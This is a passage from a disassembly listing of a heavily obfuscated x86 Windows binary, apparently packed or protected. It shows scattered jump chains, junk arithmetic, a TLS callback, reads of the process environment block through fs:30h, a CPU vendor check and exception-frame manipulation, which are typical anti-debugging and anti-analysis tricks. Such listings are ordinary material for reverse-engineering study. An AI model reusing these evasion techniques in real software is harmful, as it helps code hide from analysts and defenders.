or eax, eax
jnz loc_42AB50
; END OF FUNCTION CHUNK FOR sub_42C057
; START OF FUNCTION CHUNK FOR sub_42284F
loc_42C03A: ; CODE XREF: sub_42284F-12B3�j
jmp loc_42C531
; END OF FUNCTION CHUNK FOR sub_42284F
; =============== S U B R O U T I N E =======================================
sub_42C03F proc near ; CODE XREF: sub_42AA5F-9522�p
; sub_428B5E:loc_424443�j
; FUNCTION CHUNK AT 00426F0F SIZE 00000003 BYTES
; FUNCTION CHUNK AT 0042AAA4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042B1CF SIZE 0000000B BYTES
mov [esp+0], edi
pop edi
pop ebp
mov eax, ds:dword_429F84
or eax, eax
jnz loc_426F0F
jmp loc_42AAA4
sub_42C03F endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42C057 proc near ; CODE XREF: sub_423324:loc_4216F7�p
; sub_423324-19EB�p ...
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00421204 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00421C99 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00421CDB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004226C6 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0042369C SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004240CF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424834 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004248C8 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00425261 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004265B7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426EB3 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004281DE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00428288 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00428D2E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042937D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004299E0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042AB50 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0042AF12 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0042C032 SIZE 00000008 BYTES
jnz loc_42369C
mov eax, ds:dword_42343C
or eax, eax
jnz loc_42AB50
jmp loc_428D2E
sub_42C057 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42C070: ; CODE XREF: _94j21ax3:loc_424364�j
jnz loc_42B255
jmp loc_427AB3
; ---------------------------------------------------------------------------
loc_42C07B: ; CODE XREF: _94j21ax3:004245DE�j
push ecx
push ebx
mov ebx, edx
xchg ebx, [esp]
and eax, 814D6B6Fh
jmp loc_42A13E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C5E8
loc_42C08D: ; CODE XREF: sub_42C5E8-62A�j
jz loc_42949F
jbe sub_422141
mov [ecx], edx
rol edx, 16h
jmp loc_423400
; END OF FUNCTION CHUNK FOR sub_42C5E8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421A9F
loc_42C0A3: ; CODE XREF: sub_421A9F:loc_427C64�j
pop ecx
xor eax, eax
retn
; END OF FUNCTION CHUNK FOR sub_421A9F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429EBD
loc_42C0A7: ; CODE XREF: sub_429EBD-3E9�j
jmp sub_42780F
; END OF FUNCTION CHUNK FOR sub_429EBD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423324
loc_42C0AC: ; CODE XREF: _94j21ax3:00421684�j
; sub_423324:loc_423337�j ...
pop large dword ptr fs:0
add esp, 4
retn
; END OF FUNCTION CHUNK FOR sub_423324
; ---------------------------------------------------------------------------
loc_42C0B7: ; CODE XREF: _94j21ax3:0042C183�j
jmp loc_42313B
; =============== S U B R O U T I N E =======================================
sub_42C0BC proc near ; CODE XREF: sub_422898+4�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 004212F5 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 004217F3 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00421A2E SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00421F9D SIZE 00000006 BYTES
; FUNCTION CHUNK AT 004220CE SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0042259C SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00422E13 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042320D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00423F75 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004242F9 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00424529 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00424637 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042488B SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00425522 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042560B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426BBE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00426BFF SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00427384 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00427484 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00427548 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427B09 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00428195 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00428577 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00428C05 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428E26 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00429D30 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A384 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A403 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0042ABF8 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0042AFD1 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0042BBAB SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0042C163 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042C36D SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0042C588 SIZE 00000005 BYTES
push large dword ptr fs:0
mov large fs:0, esp
jmp loc_425522
sub_42C0BC endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B238
loc_42C0CF: ; CODE XREF: sub_42B238-8A81�j
xor edx, 0BCD6C541h
loc_42C0D5: ; CODE XREF: sub_42B238:loc_422A7B�j
push offset sub_428B71
jmp nullsub_208
; END OF FUNCTION CHUNK FOR sub_42B238
; ---------------------------------------------------------------------------
adc ebp, 142DB632h
jmp sub_425983
; ---------------------------------------------------------------------------
call sub_4251F2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_82. PRESS KEYPAD "+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_166. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
jmp locret_42A708
; ---------------------------------------------------------------------------
shr eax, 0Bh
jg loc_42697D
jmp sub_427087
; ---------------------------------------------------------------------------
loc_42C104: ; DATA XREF: sub_423C51:loc_426552�o
cmp eax, [ebp-8]
jnz loc_429C97
mov eax, [ebp-14h]
mov eax, [eax+24h]
add eax, [ebp-4]
; START OF FUNCTION CHUNK FOR sub_422EB0
loc_42C116: ; CODE XREF: sub_422EB0:loc_4218B3�j
xor edx, edx
jmp loc_42BD8F
; END OF FUNCTION CHUNK FOR sub_422EB0
; ---------------------------------------------------------------------------
shl edx, 3
jmp sub_42A9E7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423F55
loc_42C125: ; CODE XREF: sub_423F55:loc_427418�j
jnz loc_42BC7E
jmp loc_422110
; END OF FUNCTION CHUNK FOR sub_423F55
; ---------------------------------------------------------------------------
locret_42C130: ; CODE XREF: _94j21ax3:00421771�j
retn
; ---------------------------------------------------------------------------
add edx, 613DDA94h
jmp loc_429441
; ---------------------------------------------------------------------------
test al, al
jz loc_424753
jmp loc_421553
; =============== S U B R O U T I N E =======================================
sub_42C149 proc near ; CODE XREF: sub_42169F+521D�p
; FUNCTION CHUNK AT 00424F44 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00429F90 SIZE 00000005 BYTES
xchg ecx, [esp+0]
mov ecx, [esp+0]
push 0E687946Bh
pop ecx
rol ecx, 18h
and ecx, 1E759CD4h
jmp loc_424F44
sub_42C149 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C0BC
loc_42C163: ; CODE XREF: sub_42C0BC-A8BA�j
jnz loc_428E2D
jmp loc_42320D
; END OF FUNCTION CHUNK FOR sub_42C0BC
; ---------------------------------------------------------------------------
sbb esi, ecx
jmp loc_4229F5
; ---------------------------------------------------------------------------
loc_42C175: ; CODE XREF: _94j21ax3:004281FA�j
not ebp
popf
pop esi
loc_42C179: ; CODE XREF: _94j21ax3:loc_42A7EB�j
mov eax, large fs:30h
mov eax, [eax+0Ch]
jmp loc_42C0B7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424775
loc_42C188: ; CODE XREF: sub_424775:loc_42770C�j
cmp dword ptr [ebp-10h], 0
jnz loc_42C1A3
cmp dword ptr [ebp-0Ch], 5
jnz loc_42C1A3
mov eax, [ebp+8]
or dword ptr [eax-8], 8
; END OF FUNCTION CHUNK FOR sub_424775
; START OF FUNCTION CHUNK FOR sub_4232F5
loc_42C1A3: ; CODE XREF: sub_429C48:loc_421076�j
; sub_427AEB-6939�j ...
jno loc_42C400
jmp loc_422C87
; END OF FUNCTION CHUNK FOR sub_4232F5
; =============== S U B R O U T I N E =======================================
sub_42C1AE proc near ; CODE XREF: sub_429A83-3F72�p
; _94j21ax3:0042BA9D�j
; FUNCTION CHUNK AT 004210EF SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042178F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00421C38 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00421F65 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004223BB SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004229AE SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00424D01 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00424E99 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00424ECD SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00425896 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00425B6D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426650 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00426CD4 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004275DB SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00427B70 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00427EE0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042877C SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00428A5D SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00428BF0 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0042AA02 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042AEC8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042BD50 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0042C228 SIZE 00000005 BYTES
mov [esp+0], ecx
pop ecx
mov eax, 0
cpuid
xor [esi], ebx
add [esi], edx
xor [esi], ecx
cmp ebx, 756E6547h
jmp loc_42AEC8
sub_42C1AE endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42C1CA: ; CODE XREF: _94j21ax3:loc_4275C1�j
jge loc_425019
jz loc_429585
sub edi, edx
jmp loc_422252
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422C48
loc_42C1DD: ; CODE XREF: sub_422C48+3F71�j
jo loc_421FB1
loc_42C1E3: ; CODE XREF: sub_42ADA2:loc_42BB45�j
push 0F269A29Eh
pop eax
sub eax, 16E8691h
cmp eax, 206E3E65h
jmp loc_427430
; END OF FUNCTION CHUNK FOR sub_422C48
; ---------------------------------------------------------------------------
dw 0A192h
dword_42C1FC dd 0C77D45CBh ; DATA XREF: sub_42430C+8�r
; sub_424AED+391B�r
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423F55
loc_42C200: ; CODE XREF: sub_423F55+D17�j
jmp loc_42B42F
; END OF FUNCTION CHUNK FOR sub_423F55
; ---------------------------------------------------------------------------
db 57h, 6Ch, 50h
dword_42C208 dd 6E69h ; DATA XREF: _94j21ax3:00422A4C�w
; _94j21ax3:004230AF�w ...
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423324
loc_42C20C: ; CODE XREF: sub_423324-F4E�j
jmp loc_425099
; END OF FUNCTION CHUNK FOR sub_423324
; ---------------------------------------------------------------------------
db 1Dh, 0A6h, 0D0h
dword_42C214 dd 7E7751A7h ; DATA XREF: sub_423A33-26DD�w
; sub_422BD8+B�w ...
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BE84
loc_42C218: ; CODE XREF: sub_42BE84+D�j
jmp sub_428B74
; END OF FUNCTION CHUNK FOR sub_42BE84
; ---------------------------------------------------------------------------
db 5Eh, 26h, 0B8h
dword_42C220 dd 950DDFDFh ; DATA XREF: _94j21ax3:loc_421C14�w
; sub_42982D+4�r
dword_42C224 dd 9E738DDFh ; DATA XREF: sub_4220B7+4�r
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C1AE
loc_42C228: ; CODE XREF: sub_42C1AE-4628�j
jmp loc_4275DB
; END OF FUNCTION CHUNK FOR sub_42C1AE
; ---------------------------------------------------------------------------
db 93h, 6, 12h
dword_42C230 dd 9C9077E7h ; DATA XREF: sub_42265F-4FD�r
; _94j21ax3:004270DA�r
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4294E3
loc_42C234: ; CODE XREF: sub_4294E3+12�j
jmp nullsub_181
; END OF FUNCTION CHUNK FOR sub_4294E3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425934
loc_42C239: ; CODE XREF: sub_425934:loc_427926�j
jz loc_42643C
jmp loc_42A2E1
; END OF FUNCTION CHUNK FOR sub_425934
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423F55
loc_42C244: ; CODE XREF: sub_423F55+2BFE�j
or edi, 0C579D688h
jmp loc_42BC7E
; END OF FUNCTION CHUNK FOR sub_423F55
; =============== S U B R O U T I N E =======================================
sub_42C24F proc near ; CODE XREF: sub_421689:loc_427ED6�p
; sub_42A268-78�j
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004214C7 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00421EE4 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00422B01 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00423F3E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424002 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00424B3A SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0042518F SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004258A3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00426F78 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004280EB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428210 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0042C53C SIZE 0000000B BYTES
mov [esp+0], edi
pop edi
jz loc_424B3A
cmp byte ptr [ebp-5], 0
jmp loc_4280EB
sub_42C24F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42C262: ; CODE XREF: _94j21ax3:loc_4236EE�j
jnz loc_4236D1
jmp loc_426FD0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4272E9
loc_42C26D: ; CODE XREF: sub_4272E9+3B5�j
and ebx, 0B76908A1h
mov esi, [ebp+0]
ja loc_422BE9
loc_42C27C: ; CODE XREF: sub_4272E9:loc_422522�j
call sub_42C057
test al, al
jz loc_4251C3
jmp loc_423A72
; END OF FUNCTION CHUNK FOR sub_4272E9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427D65
loc_42C28E: ; CODE XREF: sub_427D65+9�j
cmp edi, 80000001h
jbe loc_423047
jmp loc_4247C6
; END OF FUNCTION CHUNK FOR sub_427D65
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421D33
loc_42C29F: ; CODE XREF: sub_421D33:loc_428547�j
pop eax
sub eax, 0ECFBA6A3h
and eax, 52B86102h
loc_42C2AC: ; CODE XREF: sub_422898:loc_421F6F�j
add eax, 0EE21B9B8h
mov eax, [eax]
jmp loc_422495
; END OF FUNCTION CHUNK FOR sub_421D33
; ---------------------------------------------------------------------------
loc_42C2B9: ; CODE XREF: _94j21ax3:loc_422E0E�j
add esi, ebp
add esi, 0E07F6B9Eh
mov [esi], edx
call sub_425301
; START OF FUNCTION CHUNK FOR sub_42982D
loc_42C2C8: ; CODE XREF: sub_42982D+C�j
jmp loc_424B49
; END OF FUNCTION CHUNK FOR sub_42982D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42131B
loc_42C2CD: ; CODE XREF: sub_42131B+10�j
push 7AA4A00Fh
mov [esp+2D0h+var_2D0], eax
call sub_429DCC
mov eax, [ebp+var_C]
jmp loc_42B14D
; END OF FUNCTION CHUNK FOR sub_42131B
; =============== S U B R O U T I N E =======================================
sub_42C2E2 proc near ; CODE XREF: _94j21ax3:00423CBA�j
; sub_421D33+680F�p
xchg eax, [esp+0]
pop eax
mov [esi], eax
pop esi
loc_42C2E9: ; CODE XREF: _94j21ax3:00422BD2�j
cmp dword ptr [ebp-8], 0
jz loc_421D73
jmp loc_42653D
sub_42C2E2 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423614
loc_42C2F8: ; CODE XREF: sub_423614+6903�j
movzx edx, byte ptr [edx]
or eax, edx
; END OF FUNCTION CHUNK FOR sub_423614
; START OF FUNCTION CHUNK FOR sub_423324
loc_42C2FD: ; CODE XREF: sub_423324:loc_421CFE�j
mov [ebp-1Ch], eax
inc dword ptr [ebp-20h]
mov eax, [ebp-1Ch]
loc_42C306: ; CODE XREF: sub_429EF8+7�j
and eax, 0FFh
mov eax, ds:dword_425FDC[eax*4]
mov [ebp-8], eax
jmp loc_429088
; END OF FUNCTION CHUNK FOR sub_423324
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424EB4
loc_42C31A: ; CODE XREF: sub_424EB4+4�j
push offset sub_427D53
jmp nullsub_188
; END OF FUNCTION CHUNK FOR sub_424EB4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42266A
loc_42C324: ; CODE XREF: sub_42266A:loc_427C40�j
push eax
push 0
call sub_42651A
call sub_42266A
loc_42C331: ; CODE XREF: _94j21ax3:00427608�j
jle loc_422B6D
add ebp, eax
jmp sub_4240C3
; END OF FUNCTION CHUNK FOR sub_42266A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427AEB
loc_42C33E: ; CODE XREF: sub_427AEB:loc_422DC2�j
call sub_4232F5
loc_42C343: ; CODE XREF: sub_42AEB2+D99�j
jmp nullsub_190
; END OF FUNCTION CHUNK FOR sub_427AEB
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429974
loc_42C349: ; CODE XREF: sub_429974-7982�j
jmp loc_423C99
; END OF FUNCTION CHUNK FOR sub_429974
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4272E9
loc_42C34E: ; CODE XREF: sub_4272E9+2CF5�j
push esi
mov [esp+4+var_4], ebp
mov ebp, esp
add esp, 0FFFFF7ECh
mov eax, offset byte_4256B4
jmp loc_425B39
; END OF FUNCTION CHUNK FOR sub_4272E9
; =============== S U B R O U T I N E =======================================
sub_42C364 proc near ; CODE XREF: sub_42C0BC-A677�p
; _94j21ax3:0042B597�j
mov [esp+0], edx
pop edx
jmp loc_4271A6
sub_42C364 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C0BC
loc_42C36D: ; CODE XREF: sub_42C0BC-7B84�j
; _94j21ax3:loc_429365�j ...
js loc_4242F9
mov eax, large fs:30h
push edi
push 0A18DDE55h
jmp loc_427548
; END OF FUNCTION CHUNK FOR sub_42C0BC
; ---------------------------------------------------------------------------
loc_42C385: ; CODE XREF: _94j21ax3:00422A1B�j
cdq
cmp ebx, eax
jmp loc_42C5FB
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_37. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_42C38E: ; CODE XREF: _94j21ax3:00426AF8�j
jmp loc_42737D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422436
loc_42C393: ; CODE XREF: sub_422436:loc_428175�j
jz loc_429C69
jmp loc_4295E3
; END OF FUNCTION CHUNK FOR sub_422436
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423FCD
loc_42C39E: ; CODE XREF: sub_423FCD+6386�j
add eax, 8FF0D88Fh
add eax, ebp
add eax, 0DD1AEB83h
push eax
jmp loc_4286E5
; END OF FUNCTION CHUNK FOR sub_423FCD
; ---------------------------------------------------------------------------
loc_42C3B2: ; CODE XREF: _94j21ax3:loc_42B2DC�j
mov ds:dword_429F88, eax
jmp locret_4295A5
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42C3BD proc near ; CODE XREF: sub_42541E�j
; FUNCTION CHUNK AT 0042A299 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0042B303 SIZE 0000000B BYTES
push ebp
mov ebp, esp
push ecx
call sub_424DE8
loc_42C3C6: ; CODE XREF: sub_422764+5237�j
jmp loc_42A299
sub_42C3BD endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_189. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4251A2
loc_42C3CC: ; CODE XREF: sub_4251A2+6889�j
jmp nullsub_192
; END OF FUNCTION CHUNK FOR sub_4251A2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4281A5
loc_42C3D1: ; CODE XREF: sub_4281A5-5C28�j
jmp loc_421492
; END OF FUNCTION CHUNK FOR sub_4281A5
; ---------------------------------------------------------------------------
loc_42C3D6: ; CODE XREF: _94j21ax3:0042745A�j
pop edx
rol edx, 7
or edx, 0BC29CBB5h
xor edx, 3411895Eh
add edx, ebp
jmp loc_4275D0
; ---------------------------------------------------------------------------
rol edi, 1Bh
jmp loc_426C2D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4232F5
loc_42C3F5: ; CODE XREF: sub_4232F5:loc_428B59�j
jnz loc_42AE45
jmp loc_42514A
; ---------------------------------------------------------------------------
loc_42C400: ; CODE XREF: sub_4232F5:loc_42C1A3�j
call sub_42773C
; END OF FUNCTION CHUNK FOR sub_4232F5
; START OF FUNCTION CHUNK FOR sub_42A7A6
loc_42C405: ; CODE XREF: sub_42A7A6+11F5�j
jmp nullsub_193
; END OF FUNCTION CHUNK FOR sub_42A7A6
; =============== S U B R O U T I N E =======================================
sub_42C40A proc near ; DATA XREF: _94j21ax3:0042127E�o
var_4 = dword ptr -4
pushf
mov [esp+4+var_4], eax
call sub_423F43
retn
sub_42C40A endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B079
loc_42C414: ; CODE XREF: sub_42B079-4B0�j
jmp loc_4235C8
; END OF FUNCTION CHUNK FOR sub_42B079
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
public TlsCallback_0
TlsCallback_0 proc near ; CODE XREF: sub_42166E+11�j
; DATA XREF: _94j21ax3:TlsCallbacks�o
; FUNCTION CHUNK AT 0042352F SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00423F94 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00424FCC SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00426F3C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429689 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042A1D6 SIZE 00000008 BYTES
push ebp
mov ebp, esp
push ecx
call sub_42A7A6
loc_42C422: ; CODE XREF: sub_42C1AE-45C�j
sbb eax, edx
loc_42C424: ; CODE XREF: sub_42C1AE:loc_424E99�j
push edx
push 82FC9A43h
pop edx
add edx, 0E675DF00h
cmp ebx, edx
pop edx
jmp loc_429689
TlsCallback_0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
and edx, 0E238D46Bh
jmp sub_429EDB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42484C
loc_42C444: ; CODE XREF: sub_42484C-1208�j
; DATA XREF: sub_423F43:loc_4235C8�o
mov eax, [ebp-4]
call sub_4252BD
test al, al
jnz loc_4269B6
; END OF FUNCTION CHUNK FOR sub_42484C
; START OF FUNCTION CHUNK FOR sub_426C7A
loc_42C454: ; CODE XREF: sub_423F55-1D8B�j
; sub_426C7A-2B58�j ...
pop ecx
pop ecx
call sub_4269A6
sbb ecx, 0F78A7FA9h
jmp sub_424CF2
; END OF FUNCTION CHUNK FOR sub_426C7A
; =============== S U B R O U T I N E =======================================
sub_42C466 proc near ; CODE XREF: _94j21ax3:00423FC8�j
; sub_42AA78-5FF6�p
mov [esp+0], eax
pop eax
pop edx
pop ecx
pop ebx
retn
sub_42C466 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4272E9
loc_42C46E: ; CODE XREF: sub_4272E9-46CA�j
jmp nullsub_194
; END OF FUNCTION CHUNK FOR sub_4272E9
; =============== S U B R O U T I N E =======================================
sub_42C473 proc near ; CODE XREF: sub_42AA78+6�p
; FUNCTION CHUNK AT 004273D7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042AE93 SIZE 0000000F BYTES
push large dword ptr fs:0
mov large fs:0, esp
jmp loc_4273D7
sub_42C473 endp
; ---------------------------------------------------------------------------
dw 870Dh
dword_42C488 dd 0 ; DATA XREF: sub_4258EB+6�w
; sub_42BFF0-4CC4�r ...
dword_42C48C dd 77E79F93h ; DATA XREF: sub_4258EB:loc_422D2F�r
; sub_4258EB-2BB3�r ...
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42966A
loc_42C490: ; CODE XREF: sub_42966A-2B8F�j
jmp nullsub_196
; END OF FUNCTION CHUNK FOR sub_42966A
; ---------------------------------------------------------------------------
db 60h, 0EBh, 2Dh
dword_42C498 dd 0 ; DATA XREF: sub_424BAA+8�w
; sub_4284C0+6�r ...
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42ABCE
loc_42C49C: ; CODE XREF: sub_42ABCE-10BA�j
jmp loc_4270CF
; END OF FUNCTION CHUNK FOR sub_42ABCE
; ---------------------------------------------------------------------------
db 0C5h, 52h, 0E3h
dword_42C4A4 dd 77E805D8h ; DATA XREF: sub_42780F-4276�w
; sub_42780F+A�r ...
dword_42C4A8 dd 628EFCE3h ; DATA XREF: sub_4250F7-3998�w
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424CF2
loc_42C4AC: ; CODE XREF: sub_424CF2-1CA5�j
jmp loc_4295DE
; END OF FUNCTION CHUNK FOR sub_424CF2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B9CF
loc_42C4B1: ; CODE XREF: sub_42B9CF-A187�j
jmp loc_427076
; END OF FUNCTION CHUNK FOR sub_42B9CF
; ---------------------------------------------------------------------------
dw 0C73Eh
dword_42C4B8 dd 71B9977Eh ; DATA XREF: _94j21ax3:00426AC6�w
; sub_429382+7�r
; ---------------------------------------------------------------------------
loc_42C4BC: ; CODE XREF: _94j21ax3:004225E7�j
cmp edi, 0FCD1987Bh
jmp loc_4284B0
; ---------------------------------------------------------------------------
loc_42C4C7: ; CODE XREF: _94j21ax3:004219F8�j
xor edx, edx
push edx
push eax
jmp loc_423279
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422F0A
loc_42C4D0: ; CODE XREF: sub_422F0A+4�j
add eax, [esp-4+arg_0]
adc edx, [esp-4+arg_4]
add esp, 8
mov eax, [eax]
add eax, [ebp-4]
loc_42C4DF: ; CODE XREF: _94j21ax3:004226E9�j
jmp loc_42B90A
; END OF FUNCTION CHUNK FOR sub_422F0A
; ---------------------------------------------------------------------------
mov edx, 64EFA9EDh
push ebx
push 0CDD5D8CAh
pop ebx
add ebx, 70226D86h
sub ebx, 7C5794CEh
test ebx, 800000h
jmp loc_424E59
; ---------------------------------------------------------------------------
locret_42C507: ; CODE XREF: _94j21ax3:004284BB�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423614
loc_42C508: ; CODE XREF: sub_423614:loc_423465�j
cmp dword ptr [ebp-4], 100h
jnz loc_422A56
jmp loc_4256D0
; END OF FUNCTION CHUNK FOR sub_423614
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4216D0
loc_42C51A: ; CODE XREF: sub_4216D0:loc_429118�j
add edx, esp
rol edx, 5
mov [ebp-4], edx
cmp dword ptr [ebp-8], 0
jbe loc_42137A
jmp loc_42366E
; END OF FUNCTION CHUNK FOR sub_4216D0
; ---------------------------------------------------------------------------
